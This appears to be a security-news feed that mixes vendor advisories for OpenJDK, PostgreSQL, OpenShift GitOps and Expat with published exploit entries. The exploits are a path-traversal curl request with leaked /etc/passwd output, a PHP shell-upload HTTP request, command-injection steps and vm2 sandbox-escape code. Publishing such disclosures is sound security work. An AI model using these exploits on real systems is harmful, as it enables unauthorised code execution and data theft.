There is an integer overflow in dav1d when decoding an AV1 video with large width/height. The integer overflow may result in an out-of-bounds write.

dav1d Integer Overflow / Out-Of-Bounds Write

Ubuntu Security Notice 6696-1 - Yi Yang discovered that the Hotspot component of OpenJDK 8 incorrectly handled array accesses in the C1 compiler. An attacker could possibly use this issue to cause a denial of service, execute arbitrary code or bypass Java sandbox restrictions. It was discovered that the Hotspot component of OpenJDK 8 did not properly verify bytecode in certain situations. An attacker could possibly use this issue to bypass Java sandbox restrictions.

==========================================================================  
Ubuntu Security Notice USN-6696-1  
March 18, 2024

openjdk-8 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in OpenJDK 8.

Software Description:  
- openjdk-8: Open Source Java implementation

Details:

Yi Yang discovered that the Hotspot component of OpenJDK 8 incorrectly  
handled array accesses in the C1 compiler. An attacker could possibly  
use this issue to cause a denial of service, execute arbitrary code or  
bypass Java sandbox restrictions. (CVE-2024-20918)

It was discovered that the Hotspot component of OpenJDK 8 did not  
properly verify bytecode in certain situations. An attacker could  
possibly use this issue to bypass Java sandbox restrictions.  
(CVE-2024-20919)

It was discovered that the Hotspot component of OpenJDK 8 had an  
optimization flaw when generating range check loop predicates. An attacker  
could possibly use this issue to cause a denial of service, execute  
arbitrary code or bypass Java sandbox restrictions. (CVE-2024-20921)

Valentin Eudeline discovered that OpenJDK 8 incorrectly handled certain  
options in the Nashorn JavaScript subcomponent. An attacker could  
possibly use this issue to execute arbitrary code. (CVE-2024-20926)

It was discovered that OpenJDK 8 could produce debug logs that contained  
private keys used for digital signatures. An attacker could possibly use  
this issue to obtain sensitive information. (CVE-2024-20945)

Hubert Kario discovered that the TLS implementation in OpenJDK 8 had a  
timing side-channel and incorrectly handled RSA padding. A remote attacker  
could possibly use this issue to recover sensitive information.  
(CVE-2024-20952)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jre                   8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~23.10.1  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~23.10.1

Ubuntu 22.04 LTS:  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~22.04  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~22.04  
   openjdk-8-jre                   8u402-ga-2ubuntu1~22.04  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~22.04  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~22.04

Ubuntu 20.04 LTS:  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~20.04  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~20.04  
   openjdk-8-jre                   8u402-ga-2ubuntu1~20.04  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~20.04  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~20.04

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   openjdk-8-jdk                   8u402-ga-2ubuntu1~18.04  
   openjdk-8-jdk-headless          8u402-ga-2ubuntu1~18.04  
   openjdk-8-jre                   8u402-ga-2ubuntu1~18.04  
   openjdk-8-jre-headless          8u402-ga-2ubuntu1~18.04  
   openjdk-8-jre-zero              8u402-ga-2ubuntu1~18.04

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart any Java  
applications to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6696-1  
   CVE-2024-20918, CVE-2024-20919, CVE-2024-20921, CVE-2024-20926,  
   CVE-2024-20945, CVE-2024-20952

Package Information:  
   https://launchpad.net/ubuntu/+source/openjdk-8/8u402-ga-2ubuntu1~23.10.1  
   https://launchpad.net/ubuntu/+source/openjdk-8/8u402-ga-2ubuntu1~22.04  
   https://launchpad.net/ubuntu/+source/openjdk-8/8u402-ga-2ubuntu1~20.04

Ubuntu Security Notice USN-6696-1

Red Hat Security Advisory 2024-1348-03 - An update for the postgresql:10 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1348.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:10 security updateAdvisory ID:        RHSA-2024:1348-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1348Issue date:         2024-03-18Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:10 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1348-03

Red Hat Security Advisory 2024-1346-03 - An update is now available for Red Hat OpenShift GitOps 1.11. Issues addressed include a cross site scripting vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1346.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift GitOps security update  
Advisory ID:        RHSA-2024:1346-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1346  
Issue date:         2024-03-16  
Revision:           03  
CVE Names:          CVE-2024-28175  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps 1.11.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.

Security Fix(es):

* Before this update, due to the improper filtering of URL protocols in the Argo CD application summary component, an attacker could achieve cross-site scripting with permission to edit the application. This update fixes the issue by upgrading the Argo CD version to v2.9.8 which has the fix applied and is therefore not vulnerable (CVE-2024-28175).

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-28175

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.11/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2268518

Red Hat Security Advisory 2024-1346-03

Red Hat Security Advisory 2024-1345-03 - An update is now available for Red Hat OpenShift GitOps 1.10. Issues addressed include a cross site scripting vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1345.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift GitOps security update  
Advisory ID:        RHSA-2024:1345-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1345  
Issue date:         2024-03-15  
Revision:           03  
CVE Names:          CVE-2024-28175  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps 1.10.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.

Security Fix(es):

* Before this update, due to the improper filtering of URL protocols in the Argo CD application summary component, an attacker could achieve cross-site scripting with permission to edit the application. This update fixes the issue by upgrading the Argo CD version to v2.8.12 which has the fix applied and is therefore not vulnerable (CVE-2024-28175)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-28175

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.10/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2268518

Red Hat Security Advisory 2024-1345-03

UPS Network Management Card version 4 suffers from a path traversal vulnerability.

    # Exploit Title: UPS Network Management Card 4 - Path Traversal# Google Dork: inurl:nmc inurl:logon.htm# Date: 2023-12-19# Exploit Author: Víctor García# Vendor Homepage: https://www.apc.com/# Version: 4# Tested on: Kali Linux# CVE: N/A# PoC:curl -khttps://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdroot:x:0:0:root:/home/root:/bin/shdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shdhcp:x:997:997::/var/run/dhcp:/bin/falsemessagebus:x:998:998::/var/lib/dbus:/bin/falsemosquitto:x:999:999::/home/mosquitto:/bin/falsenobody:x:65534:65534:nobody:/nonexistent:/bin/sh

UPS Network Management Card 4 Path Traversal

Gasmark Pro version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: GASMARK PRO-1.0 File Upload RCE## Author: nu11secur1ty## Date: 03/17/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/## Description:Vulnerable input:`<input type="file" class="form-control" id="productImage"name="productImage" style="width:auto;">`This application suffers from shell upload and remote code executionvulnerability, the attacker easilycan destroy this system, when he has credentials.STATUS: HIGH- Vulnerability CRITICAL[+]Exploit:```PHPPOST /gasmark/gasmark/php_action/createclient.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=1afinf22p9snl2nai24g29duucContent-Length: 1063Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/gasmark/gasmark/add_client.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="currnt_date"------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="name"pwned------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="gender"Female------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="mob_no"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="reffering"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="address"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"Content-Type: application/octet-stream<?php// by nu11secur1ty - 2023$fh = fopen('test.html', 'a');fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');fclose($fh);//nlink('test.html');?>------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="create"------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)## Time spent:00:25:00

Gasmark Pro 1.0 Shell Upload

Nokia BMC Log Scanner version 13 suffers from a remote command injection vulnerability.

    # Exploit Title: Nokia BMC Log Scanner Remote Code Execution# Google Dork: N/A# Date: November 29, 2023# Exploit Author: Carlos Andres Gonzalez, Matthew Gregory# Vendor Homepage: https://www.nokia.com/# Software Link: N/A# Version: 13# Tested on: Linux# CVE : CVE-2022-45899DescriptionThe BMC Log Scanner web application, available on several hosts, is vulnerable to command injectionattacks, allowing for unauthenticated remote code execution. This vulnerability is especially significantbecause this service runs as root.Steps to Reproduce:In the Search Pattern field, type:;";commandReplacing the word "command" above with any Linux command.Root access can be confirmed with the id command or any other command that would requireroot access, such as displaying the contents of the /etc/shadow file."This issue was fixed in version 13.1.

Nokia BMC Log Scanner 13 Command Injection

vm2 versions 3.9.19 and below suffer from a sandbox escape vulnerability.

    /*# Exploit Title: vm2 Sandbox Escape vulnerability# Date: 23/12/2023# Exploit Author: Calil Khalil & Adriel Mc Roberts# Vendor Homepage: https://github.com/patriksimek/vm2# Software Link: https://github.com/patriksimek/vm2# Version: vm2 <= 3.9.19# Tested on: Ubuntu 22.04# CVE : CVE-2023-37466*/const { VM } = require("vm2");const vm = new VM();const command = 'pwd'; // Change to the desired commandconst code = `async function fn() {    (function stack() {        new Error().stack;        stack();    })();}try {    const handler = {        getPrototypeOf(target) {            (function stack() {                new Error().stack;                stack();            })();        }    };    const proxiedErr = new Proxy({}, handler);    throw proxiedErr;} catch ({ constructor: c }) {    const childProcess = c.constructor('return process')().mainModule.require('child_process');    childProcess.execSync('${command}');}`;console.log(vm.run(code));

vm2 3.9.19 Sandbox Escape

Ubuntu Security Notice 6694-1 - It was discovered that Expat could be made to consume large amounts of resources. If a user or automated system were tricked into processing specially crafted input, an attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6694-1March 14, 2024expat vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Expat could be made to crash if it received specially craftedinput.Software Description:- expat: XML parsing C libraryDetails:It was discovered that Expat could be made to consume large amounts ofresources. If a user or automated system were tricked into processingspecially crafted input, an attacker could possibly use this issue to causea denial of service. (CVE-2023-52425, CVE-2024-28757)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   expat                           2.5.0-2ubuntu0.1   libexpat1                       2.5.0-2ubuntu0.1Ubuntu 22.04 LTS:   expat                           2.4.7-1ubuntu0.3   libexpat1                       2.4.7-1ubuntu0.3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6694-1   CVE-2023-52425, CVE-2024-28757Package Information:   https://launchpad.net/ubuntu/+source/expat/2.5.0-2ubuntu0.1   https://launchpad.net/ubuntu/+source/expat/2.4.7-1ubuntu0.3